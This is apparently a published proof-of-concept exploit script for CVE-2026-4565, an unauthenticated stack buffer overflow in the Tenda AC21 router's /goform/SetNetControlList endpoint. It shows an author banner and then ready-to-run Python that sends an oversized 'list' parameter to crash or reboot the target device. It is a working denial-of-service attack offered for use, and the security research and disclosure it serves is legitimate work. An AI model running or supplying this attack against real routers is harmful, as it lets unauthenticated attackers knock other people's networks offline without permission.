#!/usr/bin/env python3 # Exploit Title: Tenda AC21 - Stack Buffer Overflow in SetNetControlList # CVE: CVE-2026-4565 # Date: 2026-03-23 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.tenda.com.cn/ # Software Link: - # Affected: Tenda AC21 V1.0 V16.03.08.16 # Tested on: Tenda AC21 V1.0 V16.03.08.16 # Category: Remote Denial of Service / Buffer Overflow # Platform: Embedded (Linux-based router) # Exploit Type: Remote # CVSS: 8.8 (Critical) # CWE: CWE-120 (Classic Buffer Overflow) # Description: Unauthenticated stack-based buffer overflow in /goform/SetNetControlList via the "list" parameter # Fixed in: No official fix released as of March 2026 # Usage: python3 exploit.py <target_ip> # # Examples: # python3 exploit.py 192.168.0.1 # # Options: None (simple crash PoC) # # Notes: # - Triggers router crash/reboot (DoS) # - For RCE, payload crafting + ROP required (not included) # - Use only on devices you own or have explicit permission to test # # How to Use # Step 1: Connect to the target router's network # Step 2: Run the script with the router's IP address print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-4565 • Tenda AC21 SetNetControlList BOF ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import sys if len(sys.argv) != 2: print("Usage: python3 exploit.py <target_ip>") print("Example: python3 exploit.py 192.168.0.1") sys.exit(1) target_ip = sys.argv[1] url = f"http://{target_ip}/goform/SetNetControlList" payload_length = 1024 data = {"list": "A" * payload_length} print(f"[+] Sending buffer overflow payload (length={payload_length}) to {url}") print("[+] If successful, the router should crash or reboot shortly...") try: response = requests.post(url, data=data, timeout=6) print(f"[+] HTTP status: {response.status_code}") if response.text: print(f"[+] Response snippet: {response.text[:180]}...") except requests.exceptions.Timeout: print("[!] Timeout → Router likely crashed or rebooted") print("[!] Expected behavior for CVE-2026-4565") except requests.exceptions.ConnectionError: print("[!] Connection refused or reset → Router probably down") except Exception as e: print(f"[!] Error: {e}") print("\n[!] Exploit finished. Use only for authorized security testing.")